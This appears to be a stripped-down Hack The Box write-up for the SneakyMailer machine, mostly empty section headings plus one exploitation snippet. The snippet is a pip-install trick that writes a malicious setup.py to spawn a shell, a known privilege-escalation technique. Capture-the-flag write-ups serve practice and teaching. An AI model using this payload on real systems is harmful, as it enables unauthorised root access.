Hack The Box SneakyMailer Write-Up (Without Metasploit)

1. Executive Summary

2. Description

2.1 Enumeration

Port 21 — FTP

Port 80 — HTTP

Port 25 — Telnet

Port 143 — IMAP

2.2 Exploitation

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
pip install $TF

3. References

purple enthusiast